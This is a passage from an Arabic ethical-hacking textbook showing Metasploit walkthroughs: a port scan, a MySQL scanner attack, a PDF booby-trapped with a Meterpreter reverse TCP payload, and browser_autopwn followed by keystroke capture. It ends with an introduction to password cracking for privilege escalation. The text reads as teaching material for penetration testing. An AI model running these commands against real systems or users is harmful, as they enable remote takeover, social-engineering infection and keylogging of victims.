‫ﻋرض ﻣﻠﻔﺎت اﻟﻣﺳﺎﻋدة ﻟل ‪ MSFCLI‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫ﻣن أﺟل اﻟﻌرض اﻟﺗوﺿﯾﺣﻲ‪ ،‬ﻓﺈﻧﻧﺎ ﺳوف ﻧﻘوم ﺑﺈﺟراء ﻓﺣص ‪ .Christmas Tree Scan‬وﺳوف ﻧﺧﺗﺎر اﻟﺧﯾﺎر ‪ A‬ﻟﻌرض‬ ‫‪-‬‬
‫وﺣدات اﻟﺧﯾﺎرات اﻟﻣﺗﻘدﻣﺔ‪:‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ﯾﻣﻛﻧك ﺳرد ﻣوﺟز ﻟﻠوﺣدات اﻟﻧﻣطﯾﺔ اﻟﺣﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام اﻟوﺿﻊ ‪ .S‬وﺿﻊ ﻣﻠﺧص ھو وﺳﯾﻠﺔ راﺋﻌﺔ ﻟﻣﻌرﻓﺔ ﻛﺎﻓﺔ‬ ‫‪-‬‬
‫اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟك ﻓﻲ ‪ exploit‬اﻟذي ﺗﺣﺎول ﺗﺷﻐﯾﻠﮫ‪ .‬اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﺧﺗﯾﺎرﯾﺔ وﻟﻛن‪ ،‬ﻋﺎدة‪ ،‬ﯾطﻠب ﻣن ﻋدد ﻗﻠﯾل واﻟذي‬
‫ﯾﺳﻣﺢ ﻟك ﻟﺗﺣدﯾد اﻟﮭدف أو اﻟﻣﻧﻔذ اﻟذي ﺗﺣﺎول إطﻼق ‪ exploit‬ﺿد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪310‬‬

‫ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟﮭذا ‪ ،exploit‬ﻓﻧﺣن ﻧﺳﺗﺧدم اﻟوﺿﻊ ‪ .O‬اﻟﺧﯾﺎرات ھﻲ وﺳﯾﻠﺔ ﻟﺗﻛوﯾن وﺣدة ‪ .exploit‬ﻛل‬ ‫‪-‬‬
‫‪ exploit‬وﺣدة ﻟدﯾﮭﺎ ﻣﺟﻣوﻋﺔ ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺧﯾﺎرات )أو ﻻ ﺷﻲء ﻋﻠﻰ اﻹطﻼق(‪ .‬ﯾﺟب أن ﯾﺗم ﺗﻌﯾﯾن ﺟﻣﯾﻊ اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ ﻗﺑل‬
‫أن ﯾﺗم اﻟﺳﻣﺎح ﻟﺗﻧﻔﯾذ ‪ .exploit‬ﻣن اﻟﺻورة اﻟﺗﺎﻟﯾﺔ‪ ،‬ﺳﺗﻼﺣظ أن اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ ﯾﺗم ﺗﻌﯾﯾﻧﮭﺎ ﺑﺷﻛل اﻓﺗراﺿﻲ‪ .‬إذا ﻛﺎن‬
‫ھذا ھو اﻟﺣﺎل‪ ،‬ﻟم ﯾﻛن ﻟدﯾك ﻟﺗﺣدﯾث ﻗﯾﻣﺔ اﻟﺧﯾﺎرات إﻻ إذا ﻛﻧت ﺗرﯾد ﺗﻐﯾﯾره‪.‬‬
‫‪#msfcli auxiliary/scanner/portscan/xmas O‬‬
‫ﻟﺗﻧﻔﯾذ ‪ exploit‬ﻟدﯾﻧﺎ‪ ،‬ﻓﻧﺣن ﻧﺳﺗﺧدم اﻟوﺿﻊ ‪:E‬‬ ‫‪-‬‬
‫‪#msfcli auxiliary/scanner/portscan/xmas E‬‬

‫‪METASPLOITABLE MYSQL‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧﺳﺗﻛﺷف ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ Metasploit‬ﻟﻣﮭﺎﺟﻣﺔ ﺧﺎدم ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ‪ MYSQL‬ﺑﺎﺳﺗﺧدام وﺣدة ﻓﺣص ‪.MYSQL‬‬
‫ﻛوﻧﮭﺎ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﻔﺿﻠﺔ ﻟﻠﻛﺛﯾر ﻣن اﻟﻣﻧﺎﺑر ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ‪ Drupal‬و‪ ،WordPress‬واﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ ﺗﺳﺗﺧدم‬
‫ﺣﺎﻟﯾﺎ ﺧﺎدم ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ‪ .MYSQL‬ھذا ﯾﺟﻌﻠﮭﺎ ھدﻓﺎ ﺳﮭﻼ ﻟﮭﺟوم ‪.Metasploitable MYSQL‬‬
‫‪ -1‬ﻛﻣﺎ ﺗﻌﻠﻣﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ اﺳﺎﺳﯾﺎت ﺗﺷﻐﯾل ‪ metasploit‬ﻧﻘوم ﺑﺗﺷﻐﯾل ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل واﻟﺗﻲ ﺗؤدى‬
‫اﻟﻰ ﺗوﺟﯾﮭك اﻟﻰ اﻟﺗطﺑﯾﻖ ‪.metasploit‬‬
‫‪ -2‬ﻧﻘوم ﺑﺎﻟﺑﺣث ﻋن ﺟﻣﯾﻊ اﻟوﺣدات اﻟﻣرﺗﺑطﺔ ب ‪ MYSQL‬وذﻟك ﺑﺎﺳﺗﺧدام اﻻﻣر ‪.search mysql‬‬
‫‪ -3‬ﻧﻘوم ﺑﺎﺳﺗﺧدام وﺣدة ﻓﺣص ‪ MYSQL‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -4‬ﻧﻘوم ﺑﻌرض اﻟﻣﺗطﻠﺑﺎت اﻟﻣﺗﺎﺣﺔ ﻟﻛﻲ ﺗﻌﻣل ﺑﺎﺳﺗﺧدام اﻻﻣر ‪.show options‬‬
‫‪ -5‬ﻧﻘوم ﺑﺈﻋداد ھذه اﻟﻣﺗطﻠﺑﺎت ﺛم ﺷن اﻟﮭﺟوم ﺑﺎﺳﺗﺧدام اﻻﻣر ‪.exploit‬‬

‫‪METASPLOITABLE PDF‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧﺳﺗﻛﺷف ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ Metasploit‬ﻟﺗﻧﻔﯾذ ھﺟوم ﺑﺎﺳﺗﺧدام ﺗﻧﺳﯾﻖ اﻟﻣﺳﺗﻧدات اﻟﻣﺣﻣوﻟﺔ )‪ .(PDF‬ﻣﻠف ‪Adobe‬‬
‫‪ PDF‬ھو ﻣﻌﯾﺎر ﯾﺳﺗﺧدم ﻟﻠﻐﺎﯾﺔ ﻟﻧﻘل ﻣﺳﺗﻧد إﻟﻰ طرف آﺧر‪ .‬ﻧظرا ﻻﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧطﺎق واﺳﻊ‪ ،‬وﺧﺻوﺻﺎ ﺑﺳﺑب اﺳﺗﺧدام أﻋﻣﺎﻟﮭﺎ‪ ،‬ﺳﻧﮭﺎﺟم‬
‫ﺟﮭﺎز اﻟﻣﺳﺗﺧدم ﻣن ﺧﻼل اﻟﺳﻣﺎح ﻟﮭم ﺑﺎن ﯾﻌﺗﻘدوا أﻧﮭم ﯾﻘوﻣون ﺑﻔﺗﺢ ﻣﺳﺗﻧد ‪.PDF‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪311‬‬

‫‪ -1‬ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل‬
‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ metasploit‬ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫‪ -3‬ﻧﻘو ﺑﺎﻟﺑﺣث ﻋن ﺛﻐرات ‪ pdf‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.search pdf‬‬
‫‪ -4‬اﺳﺗﺧدام أدوﺑﻲ ‪ PDF‬ﺟزءا ﻻ ﯾﺗﺟزأ ﻣن ‪:EXE Social engineering‬‬
‫‪use exploit/windows/fileformat/adobe_pdf_embedded_exe‬‬
‫‪ -5‬ﺛم ﻧﻘوم ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ show options‬ﻟﻌرض اﻟﻣﺗطﻠﺑﺎت ﻟﺗﺷﻐﯾل ‪ exploit‬ھذا‪.‬‬
‫‪ -6‬ﻧﻼﺣظ ﻣن اﻟﻣﺗطﻠﺑﺎت اﻧﮫ ﯾﺣﺗﺎج وﺿﻊ ﻛل ﻣن ‪ FILENAME‬و‪.INFILENAME‬‬
‫‪ -7‬ﺣﯾث ﯾﻌﺑر ‪ FILENAME‬ﻋن ﻣﻠف ‪ PDF‬اﻟذي ﺗرﯾد اﻧﺷﺎﺋﮫ‪.‬‬
‫‪ -8‬وﯾﻌﺑر ‪ INFILENAME‬ﻋن ﻣوﻗﻊ ﻣﻠف ‪) PDF‬اﻟﻐﯾر ﻣﺻﺎب( اﻟﺗﻲ ﻟدﯾك وﺻول اﻟﯾﮫ ﻟﻼﺳﺗﺧدام‪.‬‬
‫‪set FILENAME evildocument.pdf‬‬
‫‪set INFILENAME /root/Desktop/willie.pdf‬‬
‫‪ -9‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ EXPLIOT‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.exploit‬‬
‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬اﺳﺗﺧدﻣﻧﺎ ‪MSFCONSOLE‬ﻹرﺳﺎل ‪ exploit‬وإﻧﺷﺎء ﻣﻠف ‪ PDF‬أدوﺑﻲ ﺗﺣﺗوي ﻋﻠﻰ ‪ Meterpreter‬ﻣﺳﺗﺗر‪ .‬ﺑدأﻧﺎ‬
‫ﻣن ﺧﻼل إطﻼق وﺣدة اﻟﺗﺣﻛم واﻟﺑﺣث ﻋن ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ ‪ PDF‬اﻟﻣﻌروﻓﺔ‪ .‬ﺑﻌد اﺧﺗﯾﺎر ‪ EXE PDF‬ﺟزءا ﻻ ﯾﺗﺟزأ ﻣن ‪ ،exploit‬واﻟذي‬
‫ﯾﺳﻣﺢ ﻟﻧﺎ ﻹﺧﻔﺎء ﺑرﻧﺎﻣﺞ ﻣﺳﺗﺗر ﻓﻲ ﻣﺷروع ‪ ،PDF‬وﺿﻌﻧﺎ ﺧﯾﺎراﺗﻧﺎ ﺛم ﻗﻣﻧﺎ ﺑﺗﻧﻔﯾذ ‪ Metasploit .exploit‬ﺳوف ﯾﻧﺷﺎ ‪ PDF‬ﯾراﻓﻘﮫ‬
‫‪ payloads‬ﻣن اﻟﻧوع ‪ .Windows Reverse TCP‬ﻋﻧدﻣﺎ ﯾﻔﺗﺢ اﻟﮭدف ﻣﻠف ‪ ،PDF‬ﻓﺎن ‪ Meterpreter‬ﺳوف ﯾﻌﻣل وﯾﻘوم ﺑﻔﺗﺢ ﻗﺎﻧﺔ‬
‫اﺗﺻﺎل ﺑﯾﻧك وﺑﯾن اﻟﮭدف‪.‬‬

‫‪IMPLEMENTING BROWSER_AUTOPWN‬‬

‫‪ BROWSER_AUTOPWN‬ھﻲ وﺣدة اﻟﻣﺳﺎﻋدة )‪ (auxiliary module‬اﻟﺗﻲ ﺗﻘدﻣﮭﺎ ‪ Metasploit‬اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﮭﺟوم ﻋﻠﻰ‬
‫ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﺑطرﯾﻘﮫ اﻟﯾﮫ ﺑﺑﺳﺎطﺔ ﻋﻧد ﻓﺗﺢ ﺻﻔﺣﺔ اﻟوﯾب‪ BROWSER_AUTOPWN .‬ﯾﻧﻔذ ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع ﻋﻠﻰ اﻟﻌﻣﯾل ﻗﺑل أن‬
‫ﯾﮭﺎﺟم؛ وھذا ﯾﻌﻧﻲ أﻧﮫ ﻟن ﯾﺣﺎول اﺧﺗراق ﻣوزﯾﻼ ﻓﺎﯾرﻓوﻛس ﺿد ﻣﺗﺻﻔﺢ إﻧﺗرﻧت إﻛﺳﺑﻠورر ‪ .7‬اﺳﺗﻧﺎدا إﻟﻰ ﺗﺻﻣﯾم اﻟﻣﺗﺻﻔﺢ‪ ،‬ﻓﺈﻧﮫ ﯾﻘرر ﻣﺎ ھو‬
‫أﻓﺿل ‪ exploit‬ﻟﻠﻧﺷر‪.‬‬

‫‪ -1‬ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل‬
‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ metasploit‬ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫‪ -3‬ﻧﻘو ﺑﺎﻟﺑﺣث ﻋن ﺛﻐرات ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.search autopwn‬‬
‫‪ -4‬اﺳﺗﺧدام اﻟوﺣدة ‪:BROWSER_AUTOPWN‬‬
‫‪use auxiliary/server/browser_autopwn‬‬
‫‪ -5‬ﻧﻘوم ﺑﺗﺛﺑﯾت ‪ PAYLOAD‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﻧﺧﺗﺎر ‪.Windows Reverse TCP‬‬
‫‪set payload windows/meterpreter/reverse_tcp‬‬
‫‪ -6‬ﺛم ﻧﻘوم ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ show options‬ﻟﻌرض اﻟﻣﺗطﻠﺑﺎت ﻟﺗﺷﻐﯾل ‪ exploit‬ھذا‪.‬‬
‫‪ -7‬ﻧﻼﺣظ ﻣن اﻟﻣﺗطﻠﺑﺎت اﻧﮫ ﯾﺣﺗﺎج وﺿﻊ ﻛل ﻣن ‪LHOST‬و‪. URIPATH‬‬
‫‪ -8‬ﺣﯾث ﯾﻌﺑر ‪LHOST‬ﻋن ﻋﻧوان ‪ IP‬ﻟﻠﻣﺿﯾف اﻟﮭدف اﻟذي ﺳوف ﯾﺗم إﺟراء اﻻﺗﺻﺎل اﻟﻌﻛﺳﻲ‪.‬‬
‫‪set LHOST 192.168.10.109‬‬
‫"‪set URIPATH "filetypes‬‬
‫‪ -9‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ EXPLIOT‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.exploit‬‬
‫‪ Metasploit -10‬ﯾﺑدأ ‪ exploit‬ﻋﻠﻰ اﻟﻌﻧوان ‪ IP‬اﻹﻟﻛﺗروﻧﻲ ‪http://[Provided IP Address]:8080‬‬
‫‪ -11‬ﻋﻧدﻣﺎ ﯾزور اﻟزاﺋر ﻋﻧوان‪ ،‬ﻓﺎن اﻟوﺣدة ‪ browser_autopwn‬ﺗﺣﺎول اﻻﺗﺻﺎل ﺑﺟﮭﺎز اﻟﻣﺳﺗﺧدم ﻹﻧﺷﺎء ‪ session‬ﺑﻌﯾدة‪ .‬ﻓﻲ ﺣﺎل‬
‫ﻧﺟﺎﺣﮭﺎ‪ ،‬ﻓﺎن ‪ Meterpreter‬ﺗواﻓﻖ ﻋﻠﻰ ھذا اﻻﺗﺻﺎل‪ .‬ﻟﺗﻧﺷﯾط ‪ ،session‬اﺳﺗﺧدم اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪sessions –I 1‬‬
‫‪ -12‬ﻟرؤﯾﺔ ﻣﻌظم أواﻣر ‪ Meterpreter‬ﯾﻣﻛن اﺻدار اﻻﻣر ‪.help‬‬
‫‪ -13‬ھﻧﺎك ﻗﺎﺋﻣﺔ ﻣن اﻷواﻣر اﻟﻣﺗوﻓرة‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﺳوف ﻧﺑدأ ﻓﺣص اﻟﻣﻔﺎﺗﯾﺢ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪312‬‬

‫‪keyscan_start‬‬
‫‪ -14‬ﻟﻠﺣﺻول ﻋﻠﻰ ‪ keystrokes‬اﻟﺗﻲ ﺗم اﺗﺧﺎذھﺎ ﻣن وﺟﮭﺔ ﻧظرن اﻟﺿﺣﯾﺔ‪ ،‬ﻓﻧﺣن ﺑﺻدد إﺻدار اﻷﻣر ‪.keyscan_dump‬‬
‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬اﺳﺗﺧدﻣﻧﺎ ‪MSFCONSOLE‬ﻹطﻼق ‪ .exploit browser_autopwn‬ﺑدأﻧﺎ ﻣن ﺧﻼل إطﻼق وﺣدة اﻟﺗﺣﻛم واﻟﺑﺣث‬
‫ﻋن ﺟﻣﯾﻊ وﺣدات ‪ autopwn‬اﻟﻣﻌروﻓﺔ‪ .‬ﺑﻌد اﺧﺗﯾﺎر وﺣدة ‪ ،autopwn‬وﺿﻌﻧﺎ ‪ payload‬ﻣن اﻟﻧوع ‪windows_reverse_tcp‬؛ واﻟذي‬
‫ﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ اﺗﺻﺎل ﻣرة أﺧرى ﻟﻧﺎ إذا ﻛﺎن اﻻﺧﺗراق ﻧﺎﺟﺢ‪ .‬ﺑﻣﺟرد زﯾﺎرة اﻟﺿﺣﯾﺔ اﻟﻣوﻗﻊ‪ ،‬ﻓﻧﺣن ﺳوف ﻧﺣﺻل ﻋﻠﻰ ‪ session‬ﻠﻠ‬
‫‪ Meterpreter‬ﻧﺷطﺔ‪.‬‬
‫ھﻧﺎ ﻧﻛون اﻧﺗﮭﯾﻧﺎ ﻣن اﻟﺟزء اﻟﺧﺎص ﺑﺎﻠ ‪ metasploit‬وﻟﻛﻧﮫ ﻟﯾس ﻛل ﺷﻲء ﺣﯾث ﺳوف ﻧﻔرد ﻟﮭذا اﻟﺟزء ﻛﺗﺎب ﺧﺎص ﺑﮫ ﻻﺣﻘﺎ وذﻟك‬
‫ﻷھﻣﯾﺗﮫ‪.‬‬

‫‪CRACKING PASSWORDS 5.3‬‬

‫ﻻ ﯾﻣﻛن أن ﯾﺗﺣﻘﻖ اﻻﺧﺗراق ﻣرة واﺣده‪ .‬ﯾﺗم إﻧﺟﺎز ذﻟك ﻣن ﺧﻼل اﻟﺧطوات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺷﻣل ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر]‪، [cracking password‬‬
‫واﻻﻣﺗﯾﺎزات اﻟﻣﺗﺻﺎﻋد]‪ ، [escalating privileges‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﻧﻔذة]‪ ، [executing applications‬أﺧﻔﺎء اﻟﻣﻠﻔﺎت]‪، [hiding files‬‬
‫وﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ]‪ ،[covering tracks‬وأﺧﯾرا اﺧﺗﺑﺎر اﻻﺧﺗراق‪ .‬اﻵن ﺣﺎن اﻟوﻗت ﻟﻣﻧﺎﻗﺷﺔ ھذه اﻟﺧطوات واﺣدة ﺗﻠو اﻷﺧرى ﺑدﻗﺔ‪ ،‬ﻟﺗﺣدﯾد‬
‫ﻛﯾﻔﯾﺔ اﺧﺗراق اﻟﻣﮭﺎﺟم اﻟﻧظﺎم‪ .‬ﻓﻲ ﻣﺣﺎوﻟﺔ اﺧﺗراق اﻟﻧظﺎم‪ ،‬ﯾﺣﺎول اﻟﻣﮭﺎﺟم اوﻻ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫أﻧﮫ ﻣن اﻟﺻﻌب أن ﻧﺗﺻور ﻣﻧﺎﻗﺷﺔ ﻣوﺿوع ﻣﺛل أﺳﺎﺳﯾﺎت اﻟﻘرﺻﻧﺔ دون ﻣﻧﺎﻗﺷﺔ ﻛﻠﻣﺎت اﻟﺳر وﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﺑﻐض اﻟﻧظر ﻋﻣﺎ ﻧﻔﻌﻠﮫ أو‬
‫ﻣدى ﺗﻘدﻣﻧﺎ‪ ،‬ﯾﺑدو أن ﻛﻠﻣﺎت اﻟﺳر ﺗظل أﻛﺛر اﻟطرق ﺷﻌﺑﯾﺔ ﻟﺣﻣﺎﯾﺔ اﻟﺑﯾﺎﻧﺎت واﻟﺳﻣﺎح ﺑﺎﻟوﺻول إﻟﻰ اﻟﻧظم‪ .‬ﻣﻊ ھذا ﻓﻲ اﻻﻋﺗﺑﺎر‪ ،‬دﻋوﻧﺎ ﻧﻠﻘﻲ‬
‫اﻟﺗﻔﺎف ﻗﺻﯾر ﻟﺗﻐطﯾﺔ أﺳﺎﺳﯾﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫ھﻧﺎك ﻋدة أﺳﺑﺎب ﻟﻣﺎذا ﻣﺧﺗﺑر اﻻﺧﺗراق ﺳوف ﺗﻛون ﻣﮭﺗﻣﺔ ھﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬أوﻻ وﻗﺑل ﻛل ﺷﻲء‪ ،‬ھذا ھو أﺳﻠوب ﻋظﯾم ﻟرﻓﻊ وﺗﺻﻌﯾد‬
‫اﻻﻣﺗﯾﺎزات‪ .‬اﻟﻧظر ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪ :‬ﻧﻔﺗرض أن ﻛﻧت ﻗﺎدرا ﻋﻠﻰ ﺧرق اﻟﻧظﺎم اﻟﮭدف وﻟﻛن ﺑﻌد ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬ﺗﻛﺗﺷف أن ﻟﯾس ﻟدﯾك أي‬
‫ﺣﻘوق ﻋﻠﻰ ھذا اﻟﻧظﺎم‪ .‬ﺑﻐض اﻟﻧظر ﻋﻣﺎ ﺗﻔﻌﻠﮫ‪ ،‬وﻛﻧت ﻏﯾر ﻗﺎدر ﻋﻠﻰ اﻟﻘراءة واﻟﻛﺗﺎﺑﺔ ﻓﻲ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات اﻟﮭدف وأﺳوأ ﻣن ذﻟك‪ ،‬ﻛﻧت‬
‫ﻏﯾر ﻗﺎدر ﻋﻠﻰ ﺗﺛﺑﯾت أي ﺑرﻧﺎﻣﺞ ﺟدﯾد‪ .‬ھذا ھو اﻟﺣﺎل ﻏﺎﻟﺑﺎ ﻋﻧد اﻟﺣﺻول ﻋﻠﻰ ﺣﺳﺎب ﻟدﯾﮭﺎ اﻣﺗﯾﺎزات ﻗﻠﯾﻠﮫ ﯾﻧﺗﻣون إﻟﻰ ﻣﺟﻣوﻋﺎت ]‪ [user‬او‬
‫]‪.[guest‬‬
‫إذا ﻛﺎن اﻟﺣﺳﺎب اﻟذي ﻟدﯾﮫ اﻟوﺻول إﻟﻰ ﻋدد ﻗﻠﯾل أو ﻟﯾس ﻟدﯾﮫ أي ﺣﻘوق‪ ،‬ﻓﻠن ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﺗﻧﻔﯾذ اﻟﻌدﯾد ﻣن اﻟﺧطوات اﻟﻣطﻠوﺑﺔ ﻟﻣزﯾد ﻣن‬
‫ﺗﻧﺎزﻻت اﻟﻧظﺎم‪ .‬إذا ﻓﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز‬
‫اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن‪.‬‬
‫ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول اﻟﻰ‬
‫ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬

‫ﻣﺎ ھو ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر )‪(CRACKING PASSWORD‬؟‬


‫‪ Password Cracking‬ھو ﻋﻣﻠﯾﺔ اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺗم ﻧﻘﻠﮭﺎ ﻋن طرﯾﻖ ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو اﻟﻣﺧزﻧﺔ ﻓﯾﮫ‪ .‬اﻟﻐرض ﻣن‬
‫‪ Password Cracking‬ﻗد ﺗﻛون ﻣﺳﺎﻋدة اﻟﻣﺳﺗﺧدم ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﻗد ﻧﺳﯾت أو ﻓﻘدت‪ ،‬ﻛﺈﺟراء وﻗﺎﺋﻲ ﻣن ﻗﺑل ﻣﺳؤوﻟﻲ اﻟﻧظﺎم‬
‫ﻟﻠﺗﺣﻘﻖ ﻣن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻛرﻛﮫ ﺑﺳﮭوﻟﺔ أو ﯾﻣﻛن أن ﺗﺳﺗﺧدم أﯾﺿﺎ ﻟﻠوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم‪.‬‬

‫اﻟﻌدﯾد ﻣن ﻣﺣﺎوﻻت اﻟﻘرﺻﻧﺔ ﺗﺑدأ ﻣﻊ ﻣﺣﺎوﻻت ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ‪ .Password Cracking‬ﻛﻠﻣﺎت اﻟﺳر ھﻲ ﻗطﻌﺔ رﺋﯾﺳﯾﺔ ﻟﻠﻣﻌﻠوﻣﺎت‬
‫اﻟﺿرورﯾﺔ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن ﻣﻌظم اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ﺗﻘﻧﯾﺎت ‪ Password Cracking‬ﻟﻠوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ‬
‫اﻟﻧظﺎم اﻟﺿﻌﯾف‪ .‬ﻗد ﺗﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﯾدوﯾﺎ أو ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل ‪ dictionary‬أو أﺳﻠوب اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪.brute-force method‬‬
‫ﺑراﻣﺞ اﻟﻛﻣﺑﯾوﺗر اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ھﻲ وظﺎﺋف ﻟﻠﺗﺣﻘﻖ ﻣن ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺣﺗﻣﻠﺔ ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة ﻣﮭﺎ‪ .‬ﻓﻲ ﻛﺛﯾر‬
‫ﻣن اﻷﺣﯾﺎن ﻓﺎن ﻏﺎﻟﺑﯾﮫ اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬ﻋﻧد إﻧﺷﺎء ﻛﻠﻣﺎت ﻣرور‪ ،‬ﯾﺳﺗﺧدﻣوا ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﻟدﯾﮭم اﺳﺗﻌداد ﻋﻠﻰ ﺗذﻛرھﺎ وﺗﻛون ﺳﮭﻠﺔ اﻟﺗوﻗﻊ‬
‫ﻣﺛل اﺳﺗﺧدام اﺳم ﺣﯾوان أﻟﯾف أو اﺧﺗﯾﺎر واﺣد ﺑﺳﯾط ﺣﺗﻰ ﯾﺗﻣﻛﻧوا ﻣن ﺗذﻛرھﺎ‪ .‬ﻣﻌظم ﺗﻘﻧﯾﺎت ﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر ﻧﺎﺟﺣﺔ ﺑﺳﺑب ﻛﻠﻣﺎت ﻣرور‬
